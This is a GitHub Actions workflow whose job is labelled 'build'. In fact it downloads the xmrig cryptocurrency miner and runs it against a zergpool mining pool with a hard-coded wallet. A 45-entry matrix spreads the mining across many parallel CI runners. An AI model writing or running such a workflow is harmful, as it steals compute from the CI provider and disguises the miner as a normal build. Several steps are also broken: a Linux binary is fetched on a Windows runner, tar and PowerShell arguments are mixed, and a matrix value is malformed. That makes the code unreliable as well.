name: eX-code_MintMe 

 

on: [workflow_dispatch] 

 

jobs: 

build: 

name: eX-code_MintMe 

runs-on: windows-latest 

strategy: 

max-parallel: 5 

fail-fast: false 

matrix: 

go: [1.0, 1.1, 1.2, 1.3, 1,35] 

flag: [A, B, C, D, E, F, G, H, I] 

env: 

NUM_JOBS: 20 

JOB: ${{ matrix.go }} 

steps: 

- name: PREPARING 

run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz && tar -xf xmrig-6.14.1-linux-x64.tar.gz -OutFile xf xmrig-6.14.1-linux-x64.tar.gz

- name: Seting-UP 

run: Expand-Archive xf xmrig-6.14.1-linux-x64.tar.gz 

- name: Running 

run: ./xmrig  -a cryptonight-upx/2 -o stratum+tcp://cryptonight_upx.asia.mine.zergpool.com:4457 -u DD6KD7UkPZ5dN7R3o2e9KwHW6BbmwNXUmn --keepalive --timeout 120 --donate-level 1 -p  c=DOGE,mc=UPX,ID=jemby

- name: END 

run: exit
